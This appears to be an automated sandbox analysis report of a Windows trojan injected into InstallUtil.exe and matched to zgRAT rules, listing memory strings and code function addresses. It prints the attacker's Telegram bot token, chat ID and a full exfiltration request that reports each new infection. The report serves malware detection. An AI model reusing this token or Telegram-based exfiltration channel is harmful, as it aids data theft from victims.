Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.443759322.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.446019562.00000000052FF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.440409078.00000000058F2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Contract/MSValue1
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Contract/MSValue1Response
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Contract/MSValue2
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Contract/MSValue2Response
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Contract/MSValue3
Source: InstallUtil.exe, 00000005.00000002.569356286.0000000003710000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Contract/MSValue3Response
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: InstallUtil.exe, 00000005.00000002.569356286.0000000003710000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.w3.o
Source: InstallUtil.exe, 00000005.00000002.577556229.00000000049B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.440409078.0000000005953000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.440409078.00000000058F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.440409078.00000000058F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.o
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.440409078.0000000005953000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.443759322.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.446019562.00000000052FF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.443759322.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.446019562.00000000052FF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.440409078.00000000058F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.440409078.00000000058F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5726741061:AAElVs4Kh5cFjADvNi4pSC5O6l_EdthxhCY/sendMessage
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.440409078.00000000058F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5726741061:AAElVs4Kh5cFjADvNi4pSC5O6l_EdthxhCY/sendMessage?chat_id=57010
Source: InstallUtil.exe, 00000005.00000002.577556229.00000000049B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: InstallUtil.exe, 00000005.00000002.577556229.00000000049B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: InstallUtil.exe, 00000005.00000002.577556229.0000000004CE5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003957000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003703000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.000000000469F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004517000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004828000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004682000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003570000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.000000000480B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.0000000005953000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004A96000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.00000000057E7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004993000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.0000000005970000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.00000000049B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: InstallUtil.exe, 00000005.00000002.577556229.00000000049B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: InstallUtil.exe, 00000005.00000002.577556229.0000000004CE5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003957000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003703000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.000000000469F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004517000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004828000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004682000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003570000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.000000000480B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.0000000005953000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004A96000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.00000000057E7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004993000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.0000000005970000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.00000000049B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: InstallUtil.exe, 00000005.00000002.577556229.0000000004CE5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003957000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003703000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.000000000469F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004517000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004828000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004682000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003570000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.000000000480B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.0000000005953000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004A96000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.00000000057E7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004993000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.0000000005970000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.00000000049B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: InstallUtil.exe, 00000005.00000002.577556229.000000000469F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004517000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004828000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.00000000057E7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.0000000005970000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.00000000049B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: InstallUtil.exe, 00000005.00000002.577556229.0000000004CE5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003957000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003703000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.000000000469F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004517000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004828000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004682000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003570000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.000000000480B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.0000000005953000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004A96000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.00000000057E7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004993000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.0000000005970000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.00000000049B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: InstallUtil.exe, 00000005.00000002.577556229.0000000004CE5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003957000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003703000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.000000000469F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004517000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004828000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004682000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.569356286.0000000003570000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.000000000480B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.0000000005953000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004A96000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.00000000057E7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.0000000004993000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.598358384.0000000005970000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.577556229.00000000049B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.newtonsoft.com/json
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: unknown DNS traffic detected: queries for: api.telegram.org
Source: global traffic HTTP traffic detected: GET /bot5726741061:AAElVs4Kh5cFjADvNi4pSC5O6l_EdthxhCY/sendMessage?chat_id=5701072641&text=%0D%0A%F0%9F%94%8A%20*NEW%20EXECUTION*%0D%0A1%EF%B8%8F%E2%83%A3%20User%20=%20user%0D%0A2%EF%B8%8F%E2%83%A3%20Date%20UTC%20=%204/26/2023%204:39:15%20PM%0D%0A3%EF%B8%8F%E2%83%A3%20File%20=%20SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe%0D%0A HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49696 version: TLS 1.2
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.441415964.000000000103B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d48440.2.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d98460.1.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d98460.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d48440.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d20420.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d48440.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d98460.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d98460.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d48440.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.3d20420.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Code function: 0_2_050E6128 0_2_050E6128
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Code function: 0_2_050E2BF2 0_2_050E2BF2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Code function: 0_2_050E2AD8 0_2_050E2AD8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Code function: 0_2_050E3465 0_2_050E3465
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Code function: 0_2_050E3C18 0_2_050E3C18
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Code function: 0_2_050E2EAC 0_2_050E2EAC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Code function: 0_2_050E34AF 0_2_050E34AF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Code function: 0_2_050E3CD0 0_2_050E3CD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Code function: 0_2_050E3F48 0_2_050E3F48
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Code function: 0_2_06333810 0_2_06333810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_017A2348 5_2_017A2348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_017A2338 5_2_017A2338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_017A4730 5_2_017A4730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_017A1CC0 5_2_017A1CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_017A1CB2 5_2_017A1CB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_030EB200 5_2_030EB200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_030E2270 5_2_030E2270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_030E10F0 5_2_030E10F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_030E9708 5_2_030E9708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_030E3F08 5_2_030E3F08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_030EAEE0 5_2_030EAEE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_030ED220 5_2_030ED220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_030EC030 5_2_030EC030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_030E10E0 5_2_030E10E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_030E1CDC 5_2_030E1CDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05600448 5_2_05600448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_05603450 5_2_05603450
